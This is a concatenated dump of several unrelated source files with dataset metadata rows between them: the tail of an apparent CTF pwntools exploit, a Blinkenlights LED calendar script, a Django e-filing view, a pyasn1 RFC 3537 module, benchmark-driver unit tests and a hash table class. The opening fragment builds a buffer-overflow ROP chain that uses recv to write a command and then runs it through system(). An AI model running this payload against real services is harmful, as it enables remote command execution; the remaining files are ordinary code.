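# ROP plan (reading the payload below): the pop gadgets load
# recv(fd, binary.bss(), len(command), 0) to write `command` into .bss
# (rcx carries the flags argument, rbx just soaks up a junk qword),
# then a final pop rdi; system(binary.bss()) executes it.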
payload = b''
payload += 0x418 * b'A'
payload += p64(pop_rdi)
payload += p64(fd)
payload += p64(pop_rsi)
payload += p64(binary.bss())
payload += p64(pop_rdx_rcx_rbx)
payload += p64(len(command))
payload += p64(0)
payload += p64(0)
payload += p64(binary.plt.recv)
payload += p64(pop_rdi)
payload += p64(binary.bss())
payload += p64(libc.sym.system)
p.sendlineafter(b'password:', b'loveandbeauty')
p.sendlineafter(b'processed:\n',payload)
sleep(0.1)
p.send(command)
p.stream()
| 25.519231 | 76 | 0.6948 | 212 | 1,327 | 4.283019 | 0.410377 | 0.132159 | 0.030837 | 0.019824 | 0.248899 | 0.169604 | 0 | 0 | 0 | 0 | 0 | 0.122432 | 0.119819 | 1,327 | 51 | 77 | 26.019608 | 0.654966 | 0.104748 | 0 | 0.235294 | 0 | 0 | 0.184263 | 0.030876 | 0 | 0 | 0.043825 | 0 | 0 | 1 | 0 | false | 0.029412 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37495eaeb03f7a3a0e3a85e6649c760538db37b4 | 9,932 | py | Python | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 3 | 2021-05-23T20:16:03.000Z | 2022-02-16T15:52:19.000Z | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 2 | 2021-06-15T14:01:01.000Z | 2021-07-08T13:31:10.000Z | Blinkenlights/clients/cal.py | mbalasz/Blinkenlights | f95cb40fb6c9c078ed174a2b70e74f20084db124 | [
"Apache-2.0"
] | 7 | 2021-06-07T11:36:04.000Z | 2021-10-31T23:18:10.000Z | #!/usr/bin/python3
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# A script to upload a bunch of png files to the matrix.
import argparse
import arrow
import blinken
import clock
import ics
import os
import requests
import sys
import time
from PIL import Image, ImageColor, ImageDraw
def parse_args(args):
parser = argparse.ArgumentParser(
description='Draw an animated square rainbow.')
parser.add_argument('-v', '--verbose',
type=bool, default=False, action=argparse.BooleanOptionalAction,
help='Print data sent to / received from the board.')
parser.add_argument('-r', '--reset',
type=bool, default=True, action=argparse.BooleanOptionalAction,
help='Reset data stored on board before sending new data.')
parser.add_argument('-t', '--time',
type=int, default=1000, metavar='TIME',
help='Display each frame for TIME ms. (default: %(default)s)')
parser.add_argument('-g', '--gamma',
type=float, default=0.7, metavar='GAMMA',
help='Apply GAMMA correction to PNG. (default: %(default)s)')
parser.add_argument('-d', '--device',
type=str, default='/dev/ttyUSB0', metavar='DEVICE',
help='Use DEVICE to talk to board. (default: %(default)s)')
parser.add_argument('-s', '--speed',
type=int, default=115200, metavar='SPEED',
help='Connect serial device at SPEED bps. (default: %(default)s)')
parser.add_argument('-c', '--calendar',
type=str, metavar='CAL',
default=('https://calendar.google.com/calendar/ical/' +
os.environ.get('USER') + '%40google.com/public/basic.ics'),
help='File or URL to fetch an ICS-format calendar from.')
return parser.parse_args(args)
colours = {
'white': ImageColor.getrgb('#ffffff'),
'grey': ImageColor.getrgb('#3f3f3f'),
'red': ImageColor.getrgb('#ff0000'),
'orange': ImageColor.getrgb('#ff3f00'),
'yellow': ImageColor.getrgb('#ffff00'),
'green': ImageColor.getrgb('#00ff00'),
'cyan': ImageColor.getrgb('#007fff'),
'blue': ImageColor.getrgb('#0000ff'),
'purple': ImageColor.getrgb('#3f00ff'),
'pink': ImageColor.getrgb('#ff3f3f'),
}
rainbow = ['red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple']
def splash(bl):
buf = Image.new(mode='RGB', size=(16, 16))
draw = ImageDraw.Draw(buf)
# Splash animation is 210ms long.
# Hopefully 21s is enough time to load everything from calendar.
with bl.animation(210*100) as anim:
for shuf in reversed(range(7)):
r = rainbow.copy()
r = r[shuf:len(r)] + r[0:shuf]
for i, colour in enumerate(r):
draw.rectangle([(2*i)+1, 0, (2*i)+2, 15], colours[colour])
anim.frame_from_image(buf, 30)
class Box(object):
def __init__(self, n, begin, end):
self._n = n
self._begin = begin
self._end = end
self._events = []
def __bool__(self):
return bool(self._events)
def __len__(self):
return len(self._events)
def __iter__(self):
return self._events.__iter__()
def BeginsIn(self, event):
return event.begin >= self._begin and event.begin < self._end
def EndsIn(self, event):
return event.end > self._begin and event.end <= self._end
def AddEvent(self, event):
self._events.append(event)
def Fill(self, draw, colour):
x, y = divmod(self._n, 2)
draw.rectangle([(3*x)+1,(4*y)+1,(3*x)+2,(4*y)+3], colour)
class Cal(object):
def __init__(self, file_or_url, now=arrow.now()):
self._url = None
self._current_hour = None
if file_or_url.startswith('https://'):
self._last_fetch = None
self._url = file_or_url
self.RefreshCal()
else:
self._cal = ics.Calendar(open(file_or_url).read())
self.UpdateBoxes(now)
def RefreshCal(self):
if not self._url:
return
if self._last_fetch and self._last_fetch > arrow.now().shift(days=-1):
return
print(f'Fetching calendar data from {self._url} ... ',
end='', flush=True)
self._cal = ics.Calendar(requests.get(self._url).text)
self._last_fetch = arrow.now()
print('done.')
def Upcoming(self, start, end):
events = list(self._cal.timeline.overlapping(start, end))
sf, ef = start.format('HH:mm'), end.format('HH:mm')
print(f'Found {len(events)} upcoming events for period {sf} to {ef}.')
return events
def Boxes(self, start):
end = start.shift(hours=5, seconds=-1)
# Calendar events are quantized to 30 minute boxes.
# Grid shows current hour + next 4, 1h per column.
# List index == box position in grid, 10 boxes total.
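        # e.g. box 0 is the first half of the current hour (column 0, top
        # cell), box 1 its second half (column 0, bottom cell), and box 9
        # the second half of hour +4; Box.Fill maps index n to column
        # n // 2 and row n % 2.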
boxes = []
for hour in range(5):
boxes.append(Box(2*hour,
begin=start.shift(hours=hour, minutes=0),
end=start.shift(hours=hour, minutes=30)))
boxes.append(Box(2*hour+1,
begin=start.shift(hours=hour, minutes=30),
end=start.shift(hours=hour+1, minutes=0)))
# Map upcoming events to boxes.
for event in self.Upcoming(start, end):
if event.all_day or event.end == start:
continue
in_event = False
for box in boxes:
if box.BeginsIn(event):
in_event = True
if in_event:
box.AddEvent(event)
if box.EndsIn(event):
in_event = False
return boxes
def UpdateBoxes(self, now):
self.RefreshCal()
if self._current_hour and self._current_hour == now.hour:
return
self._current_hour = now.hour
start = now.floor('hour')
self._boxes = self.Boxes(start)
def Draw(self, draw, now):
boxes = self._boxes
# Rules:
# - If in meeting now or <5 mins, grid should be red, otherwise blue
meeting_tests = [0]
if now.minute >= 25:
# In the 5 mins between 25 past and half past, test both box 0 and
# box 1 for the presence of meetings.
meeting_tests.append(1)
if now.minute >= 30:
meeting_tests.pop(0)
if now.minute >= 55:
meeting_tests.append(2)
grid_colour = colours['blue']
for boxno in meeting_tests:
if boxes[boxno]:
grid_colour = colours['red']
self._Grid(draw, grid_colour)
# - Upcoming events colour their related box cyan.
for box in boxes[1:]:
if box:
box.Fill(draw, colours['cyan'])
# - For first column, if currently in a meeting, box is orange.
# - If in second 30m of hour, box 0 is grey.
if now.minute >= 30:
boxes[0].Fill(draw, colours['grey'])
if boxes[1]:
boxes[1].Fill(draw, colours['orange'])
else:
if boxes[0]:
boxes[0].Fill(draw, colours['orange'])
# - TODO: If no meeting now and meeting in >1m, flash box for next meeting?
# - TODO: Different colours / patterns for >1 meeting in a box?
# - TODO: Different colour if event=yes? Not available with free/busy.
def _Grid(self, draw, colour):
# Lay out grid.
draw.rectangle([0, 0, 15, 8], outline=colour)
# This one is always white because it's the 30m separator.
draw.line([1,4,14,4], colours['white'])
for x in range(3, 15, 3):
draw.line([x,1,x,7], colour)
def main():
args = parse_args(sys.argv[1:])
if args.time < 200:
print('error: --time values <200ms are not supported.\n'
'Uploading a frame takes ~180ms...')
sys.exit(1)
bl = blinken.Blinken(
gamma=args.gamma,
debug=args.verbose,
dev=args.device,
speed=args.speed)
if args.reset:
bl.command('RST')
# Render a splash screen to ensure there's always
# one animation in the queue as our "framebuffer"
# and cause people seizures as we fetch calendar data ;-)
splash(bl)
clk = clock.Clock(10)
cal = Cal(args.calendar)
frame = 0
start = time.clock_gettime(time.CLOCK_MONOTONIC)
while True:
now = arrow.now()
buf = Image.new(mode='RGB', size=(16, 16))
draw = ImageDraw.Draw(buf)
cal.Draw(draw, now)
clk.Draw(draw)
with bl.animation(1100, start_next=True) as anim:
anim.frame_from_image(buf, 1100)
# Keep calendar updates in the dead time between frame draws.
# Update for *next* second because that's when it'll be rendered.
# TODO: put it on a separate thread, fetching and parsing 500kb
# of ICS data with raw python is multiple-seconds slow and will
# cause a noticeable period of blank screen.
cal.UpdateBoxes(now.shift(seconds=1))
frame += 1
frametime = (start + ((args.time/1000)*frame)) - time.clock_gettime(time.CLOCK_MONOTONIC)
if frametime < 0:
print('Negative frame time, things are taking too long :-O')
continue
time.sleep(frametime)
if __name__ == '__main__':
main()
| 34.971831 | 97 | 0.592429 | 1,312 | 9,932 | 4.398628 | 0.297256 | 0.027725 | 0.02062 | 0.014556 | 0.106221 | 0.065846 | 0.015942 | 0.015942 | 0.015942 | 0.015942 | 0 | 0.026715 | 0.283931 | 9,932 | 283 | 98 | 35.095406 | 0.78473 | 0.197644 | 0 | 0.085 | 0 | 0 | 0.130566 | 0.003785 | 0 | 0 | 0 | 0.003534 | 0 | 1 | 0.09 | false | 0 | 0.05 | 0.025 | 0.205 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3749d562b21ac17eff7db98c573f8f834fbad3b1 | 6,455 | py | Python | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | import base64
import random
import re
from django.conf import settings
from django.contrib import messages
from django.shortcuts import redirect
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from ..decorators import prequal_completed
from ..models import Document, UserResponse
from ..utils.efiling_documents import forms_to_file
from ..utils.efiling_packaging import EFilingPackaging
from ..utils.efiling_submission import EFilingSubmission
from ..utils.user_response import get_data_for_user
MAX_MEGABYTES = 10
@login_required
@prequal_completed
def submit_initial_files(request):
return _submit_files(request, initial=True)
@login_required
@prequal_completed
def submit_final_files(request):
return _submit_files(request, initial=False)
def _submit_files(request, initial=False):
""" App flow logic """
responses_dict = get_data_for_user(request.user)
errors, hub_redirect_url = _validate_and_submit_documents(
request, responses_dict, initial=initial)
if hub_redirect_url:
return redirect(hub_redirect_url)
if initial:
original_step = 'initial_filing'
next_page = 'wait_for_number'
else:
original_step = 'final_filing'
next_page = 'next_steps'
if errors:
next_page = original_step
if not isinstance(errors, list):
errors = [errors]
for error in errors:
messages.add_message(request, messages.ERROR, error)
responses_dict['active_page'] = next_page
return redirect(reverse('dashboard_nav', kwargs={'nav_step': next_page}), context=responses_dict)
def _validate_and_submit_documents(request, responses, initial=False):
""" Validation and submission logic """
user = request.user
errors = []
if not initial:
user_has_submitted_initial = responses.get('initial_filing_submitted') == 'True'
if not user_has_submitted_initial:
errors.append(
"You must file the initial filing first before submitting the final filing.")
court_file_number = responses.get('court_file_number')
if not court_file_number:
errors.append("You must input your Court File Number")
elif not re.search("^[0-9]{4,10}$", court_file_number):
errors.append("A Court File Number contains only digits and must be between 4 and 10 digits in length")
uploaded, generated = forms_to_file(responses, initial)
for form in uploaded:
if form['doc_type'] not in ['EFSS1', 'AFTL']:
total_size = 0
docs = Document.objects.filter(
bceid_user=user, doc_type=form['doc_type'], party_code=form.get('party_code', 0))
if docs.count() == 0:
errors.append(f"Missing documents for {Document.form_types[form['doc_type']]}")
for doc in docs:
total_size += doc.size
if total_size > MAX_MEGABYTES * 1024 * 1024:
errors.append(
f"{Document.form_types[form['doc_type']]} exceeds the { MAX_MEGABYTES } MB size limit")
if errors:
return errors, None
    if not settings.EFILING_HUB_ENABLED:
        response = _after_submit_files(request, initial)
        return None, response.url
msg, redirect_url = _package_and_submit(request, uploaded, generated, responses, initial)
if redirect_url:
return None, redirect_url
if msg != 'success':
errors.append(msg)
return errors, None
return None, None
def _package_and_submit(request, uploaded, generated, responses, initial):
""" Build the efiling package and submit it to the efiling hub """
packaging = EFilingPackaging(initial)
hub = EFilingSubmission(initial, packaging)
post_files, documents = packaging.get_files(request, responses, uploaded, generated)
redirect_url, msg = hub.upload(request, responses, post_files, documents)
return msg, redirect_url
@login_required
@prequal_completed
def after_submit_initial_files(request):
return _after_submit_files(request, initial=True)
@login_required
@prequal_completed
def after_submit_final_files(request):
return _after_submit_files(request, initial=False)
def _after_submit_files(request, initial=False):
responses_dict = get_data_for_user(request.user)
if initial:
next_page = 'wait_for_number'
else:
next_page = 'next_steps'
user = request.user
prefix = 'initial' if initial else 'final'
_save_response(user, f'{prefix}_filing_submitted', 'True')
if not initial:
_save_response(user, 'final_filing_status', 'Submitted')
package_number = _get_package_number(request)
_save_response(user, f'{prefix}_filing_package_number', package_number)
if settings.DEPLOYMENT_TYPE == 'localdev':
base_url = 'https://dev.justice.gov.bc.ca'
else:
base_url = settings.PROXY_BASE_URL
# purge the attachments
Document.objects.filter(
bceid_user=user,
filing_type=('i' if initial else 'f')
).delete()
receipt_link = base_url + '/cso/filing/status/viewDocument.do?actionType=viewReceipt&packageNo=' + package_number
_save_response(user, f'{prefix}_filing_receipt_link', receipt_link)
package_link = base_url + '/cso/accounts/bceidNotification.do?packageNo=' + package_number
_save_response(user, f'{prefix}_filing_package_link', package_link)
responses_dict['active_page'] = next_page
return redirect(reverse('dashboard_nav', kwargs={'nav_step': next_page}), context=responses_dict)
def _get_package_number(request):
if settings.EFILING_HUB_ENABLED:
base64_message = request.GET.get('packageRef', '')
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
parts = message.split('=')
if len(parts) == 2:
return parts[1]
# Generate a random string in format 000-000-000
package_number_parts = []
for _ in range(3):
num = ''
for _ in range(3):
num += str(random.randint(0, 9))
package_number_parts.append(num)
return '-'.join(package_number_parts)
def _save_response(user, question, value):
response, _ = UserResponse.objects.get_or_create(bceid_user=user, question_id=question)
response.value = value
response.save()
| 32.933673 | 117 | 0.698993 | 808 | 6,455 | 5.311881 | 0.238861 | 0.033551 | 0.029357 | 0.040774 | 0.337139 | 0.288677 | 0.199674 | 0.162861 | 0.102516 | 0.078751 | 0 | 0.009977 | 0.208056 | 6,455 | 195 | 118 | 33.102564 | 0.829617 | 0.027576 | 0 | 0.246479 | 0 | 0 | 0.145437 | 0.052102 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070423 | false | 0 | 0.098592 | 0.028169 | 0.274648 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374dd8193ca54427fd3b47ebd2fa213180ba8a3d | 796 | py | Python | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 34 | 2016-04-03T09:10:31.000Z | 2022-02-12T20:38:31.000Z | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 138 | 2017-05-31T09:25:10.000Z | 2022-02-07T09:00:19.000Z | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 36 | 2016-03-16T00:37:04.000Z | 2021-11-12T12:09:43.000Z | #
# This file is part of pyasn1-modules software.
#
# Created by Russ Housley.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
# Wrapping an HMAC key with a Triple-DES key or an AES key (CMS)
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc3537.txt
#
from pyasn1.type import constraint
from pyasn1.type import univ
from pyasn1_modules import rfc5280
id_alg_HMACwith3DESwrap = univ.ObjectIdentifier('1.2.840.113549.1.9.16.3.11')
id_alg_HMACwithAESwrap = univ.ObjectIdentifier('1.2.840.113549.1.9.16.3.12')
# Update the Algorithm Identifier map in rfc5280.py.
_algorithmIdentifierMapUpdate = {
id_alg_HMACwith3DESwrap: univ.Null(""),
id_alg_HMACwithAESwrap: univ.Null(""),
}
rfc5280.algorithmIdentifierMap.update(_algorithmIdentifierMapUpdate)
| 22.742857 | 77 | 0.757538 | 108 | 796 | 5.481481 | 0.601852 | 0.033784 | 0.047297 | 0.067568 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0 | 0.091954 | 0.125628 | 796 | 34 | 78 | 23.411765 | 0.758621 | 0.383166 | 0 | 0 | 0 | 0 | 0.109244 | 0.109244 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374f3b7ef3585b1770c1ec627dee8e6fd5b66ec8 | 6,195 | py | Python | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 359 | 2018-06-16T02:42:54.000Z | 2022-03-21T06:39:26.000Z | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 257 | 2018-07-03T22:08:27.000Z | 2022-03-31T18:45:04.000Z | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 77 | 2018-06-16T04:00:29.000Z | 2022-02-19T03:07:58.000Z | #!/usr/bin/env python
##############################################################################
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
# import os
# import sys
import unittest
import driver.benchmark_driver as bd
class BenchmarkDriverUnitTest(unittest.TestCase):
def setUp(self):
return
log_prefix = "ERROR:GlobalLogger:"
array1 = [0.0, 1.0, 2.0, 3.0, 4.0]
array2 = [4.0, 3.0, 2.0, 1.0, 0.0]
array_with_zero_mean = [-2.0, -1.0, 0.0, 1.0, 2.0]
expected1 = {
"mean": 2.0,
"p0": 0.0,
"p10": 0.4,
"p50": 2.0,
"p90": 3.6,
"p100": 4.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": 0.7071067811865476,
}
expected2 = {
"mean": 2.0,
"p0": 0.0,
"p10": 0.4,
"p50": 2.0,
"p90": 3.6,
"p100": 4.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": 0.7071067811865476,
}
result_with_cv_none = {
"mean": 0.0,
"p0": -2.0,
"p10": -1.6,
"p50": 0.0,
"p90": 1.6,
"p100": 2.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": None,
}
def test_getStatistics1(self):
self.assertEqual(bd._getStatistics(self.array1), self.expected1)
def test_getStatistics2(self):
self.assertEqual(bd._getStatistics(self.array2), self.expected2)
def test_getStatistics_with_zero_mean(self):
self.assertEqual(
bd._getStatistics(self.array_with_zero_mean), self.result_with_cv_none
)
def test_getStatistics_custom_valid(self):
stats = ["p10", "p90", "p50", "p95", "p5", "p11"]
expected = {
"p10": 0.4,
"p11": 0.44,
"p5": 0.2,
"p50": 2.0,
"p90": 3.6,
"p95": 3.8,
}
self.assertEqual(bd._getStatistics(self.array1, stats), expected)
def test_getStatistics_custom_missing_p50(self):
stats = ["p10", "p90", "p95", "p5", "p11"]
expected = {
"p10": 0.4,
"p11": 0.44,
"p5": 0.2,
"p90": 3.6,
"p95": 3.8,
"p50": 2.0,
}
self.assertEqual(bd._getStatistics(self.array1, stats), expected)
def test_getStatistics_custom_padf(self):
stats = ["padf"]
with self.assertLogs(level="ERROR") as log:
self.assertRaises(AssertionError, bd._getStatistics, self.array1, stats)
self.assertIn(
self.log_prefix
+ "Unsupported custom statistic '{}' ignored.".format(stats[0]),
log.output,
)
def test_getStatistics_custom_p(self):
stats = ["p"]
with self.assertLogs(level="ERROR") as log:
self.assertRaises(AssertionError, bd._getStatistics, self.array1, stats)
self.assertIn(
self.log_prefix
+ "Unsupported custom statistic '{}' ignored.".format(stats[0]),
log.output,
)
def test_createDiffOfDelay1(self):
expectedDiff = {
"mean": 0.0,
"p0": -4.0,
"p10": -3.2,
"p50": 0.0,
"p90": 3.2,
"p100": 4.0,
"stdev": 0.0,
"MAD": 0.0,
"cv": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.expected1, self.expected1), expectedDiff
)
def test_createDiffOfDelay_None1(self):
expectedDiff = {
"mean": 2.0,
"p0": -2.0,
"p10": -1.2,
"p50": 2.0,
"p90": 5.2,
"p100": 6.0,
"stdev": 0.0,
"MAD": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.result_with_cv_none, self.expected1),
expectedDiff,
)
def test_createDiffOfDelay_None2(self):
expectedDiff = {
"mean": -2.0,
"p0": -6.0,
"p10": -5.2,
"p50": -2.0,
"p90": 1.2,
"p100": 2.0,
"stdev": 0.0,
"MAD": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.expected1, self.result_with_cv_none),
expectedDiff,
)
def test_getPercentile_EmptyError(self):
percentile = 50
self.assertRaises(AssertionError, bd._getPercentile, [], percentile)
def test_getPercentile_HighError(self):
percentile = 106.1
self.assertRaises(AssertionError, bd._getPercentile, self.array1, percentile)
def test_getPercentile_LowError(self):
percentile = -1
self.assertRaises(AssertionError, bd._getPercentile, self.array1, percentile)
def test_percentileArgVal_invalid(self):
self.assertEqual(bd._percentileArgVal("padf"), None)
self.assertEqual(bd._percentileArgVal("p101.6"), None)
self.assertEqual(bd._percentileArgVal("p-1"), None)
self.assertEqual(bd._percentileArgVal("p"), None)
def test_percentileArgVal_float(self):
self.assertEqual(bd._percentileArgVal("p99.9"), 99.9)
self.assertEqual(bd._percentileArgVal("p66.6"), 66.6)
def test_getStatisticsSet_default(self):
expected = ["mean", "p0", "p10", "p50", "p90", "p100", "stdev", "MAD", "cv"]
self.assertEqual(bd._default_statistics, expected)
self.assertEqual(bd._getStatisticsSet(None), expected)
self.assertEqual(bd._getStatisticsSet([]), expected)
def test_getStatisticsSet_fromTest(self):
expected = ["p10", "p90", "p50"]
self.assertEqual(bd._getStatisticsSet({"statistics": expected}), expected)
    def test_getStatisticsSet_p50_missing(self):
        stats = ["p10", "p90"]
        expected = ["p10", "p90", "p50"]
        self.assertEqual(bd._getStatisticsSet({"statistics": stats}), expected)
if __name__ == "__main__":
unittest.main()
| 28.548387 | 85 | 0.528168 | 671 | 6,195 | 4.734724 | 0.193741 | 0.089707 | 0.101668 | 0.062323 | 0.603399 | 0.506453 | 0.380548 | 0.376456 | 0.367013 | 0.308467 | 0 | 0.097209 | 0.305892 | 6,195 | 216 | 86 | 28.680556 | 0.641628 | 0.035028 | 0 | 0.46988 | 0 | 0 | 0.078775 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 1 | 0.114458 | false | 0 | 0.012048 | 0.006024 | 0.180723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3752450480eea1c7e55ce4fc9b56d64c75873411 | 4,604 | py | Python | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | class Node:
# Defining a Node
def __init__(self, key=None, value=None):
"""A Node Class
Keyword Arguments:
key {int} -- The unique key for a Node (default: {None})
value {int} -- The data for the the Node (default: {None})
"""
self.key = key
self.value = value
class HashTable:
"""
    This is a class for HashTable that generates hash codes for different
    keys and stores the values.
Attributes:
maxsize (int) : The max number of elements in the HashTable
currentsize (int): The number of current elements in the Hash Table
"""
def __init__(self):
self.maxsize = 100
self.currentsize = 0
self.arr = [None]*self.maxsize
# Hashing function
def hashCode(self, key):
""" This function generates a hashcode
Arguments:
key {integer} -- The key for generating the hashcode
Returns:
integer -- Returns the hashcode for the particular given key
"""
# The hash function here is the python based hash-function
# I felt no need to change the hash function as it is working fine
return hash(key) % self.maxsize
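    # Note: CPython's hash(n) == n for small non-negative ints, so with
    # maxsize 100 the keys 11, 111 and 1011 used in __main__ below all land
    # in slot 11 and exercise the linear-probing collision path.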
# Insert a Value with help of hashing
def insertNode(self, key, value):
""" This method Inserts a Value with help of hashing and checks for collision
and if it collides follows a linear probing.
Arguments:
key {integer} -- This is the key for generating the hashcode
value {integer} -- This is the value that is going to be inserted in the
hashtable as a Node
"""
if self.arr[self.hashCode(key)] is None:
# If the cell is Empty
self.arr[self.hashCode(key)] = Node(key, value)
else:
# Collision found
status = False
HashCode = self.hashCode(key)
while self.arr[HashCode] is not None:
                # If the adjacent cell of the hash table is occupied
HashCode = (HashCode + 1)
# if the increment exceeds the max size of the hash table
if HashCode >= self.maxsize and status == True:
raise Exception('\n ------ | OverFlow of Data |--------- ')
elif (HashCode >= self.maxsize):
HashCode = HashCode % self.maxsize
status = True
self.arr[HashCode] = Node(key, value)
# Incrementing the current size of the elements in the hash table
self.currentsize = self.currentsize+1
# Get the value at the key
def get(self, key):
""" Retrive the value at the postion of the key.
Arguments:
key {integer} -- The key for the generating the hashCode to retrieve value
Returns:
{integer} -- The actual value that is stored at the hashcode of key
"""
HashCode = self.hashCode(key)
if self.arr[HashCode] is None:
return None
else:
while self.arr[HashCode].key != key:
HashCode = HashCode+1
if HashCode >= self.maxsize:
HashCode = HashCode % self.maxsize
elif self.arr[HashCode] is None:
# If the array's position with Hash Codes is empty
# It ensures that the item with that Hash code is missing
return None
elif HashCode == self.hashCode(key):
# If the Hash Codes takes one round searching for the key
return None
return self.arr[HashCode].value
# Method to find if the hash table is empty
def isEmpty(self):
""" Checks if the HashTable is empty
Returns:
bool -- Returns false if the hashTable is empty
"""
return self.currentsize == 0
if __name__ == "__main__":
mytable = HashTable()
""" Inserting Values in the table with keys """
mytable.insertNode(1, 1)
mytable.insertNode(11, 2)
mytable.insertNode(101, 3)
mytable.insertNode(102, 4)
mytable.insertNode(111, 5)
mytable.insertNode(1001, 6)
mytable.insertNode(1011, 7)
"""
Getting a value for a particular key
"""
print("\nChecking for the values for keys in Hash Table:\n")
print('The value for key 1 is : {}'.format(mytable.get(1)))
print('The value for key 101 is : {}'.format(mytable.get(101)))
print('The value for key 111 is : {}'.format(mytable.get(111)))
| 32.885714 | 86 | 0.572546 | 573 | 4,604 | 4.572426 | 0.249564 | 0.024046 | 0.034351 | 0.026336 | 0.2 | 0.093511 | 0.035115 | 0 | 0 | 0 | 0 | 0.016279 | 0.346221 | 4,604 | 139 | 87 | 33.122302 | 0.854153 | 0.399001 | 0 | 0.163636 | 0 | 0 | 0.076699 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0 | 0 | 0.254545 | 0.072727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
